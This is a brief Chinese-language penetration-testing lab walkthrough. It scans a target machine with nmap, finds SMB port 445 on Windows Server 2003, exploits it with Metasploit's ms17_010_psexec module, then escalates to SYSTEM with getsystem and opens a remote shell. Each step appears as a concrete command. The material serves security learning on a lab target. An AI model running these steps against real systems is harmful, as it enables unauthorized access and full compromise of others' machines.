一、首先先扫描一下靶机
nmap -sS -sV -O -Pn 192.168.18.133
其中sS是半开放扫描,sV是扫描版本号,O是扫描操作系统,Pn是不进行ping,会快一点。
可以看到有445端口,且是windows server 2003。
二、使用msfconsole
开启msfconsole。使用模块ms17_010_psexec。可以show option查看
只需要设置RHOST目标主机即可。那么就设置.set RHOST 192.168.18.133。设置好后直接执行run
提权命令getsystem
使用getsystem提升当前进城执行账户微system用户,拿到系统最高权限
getsystem
shell命令
获取目标主机的远程命令行shell
本文由 梁承龙 创作,采用 知识共享署名4.0 国际许可协议进行许可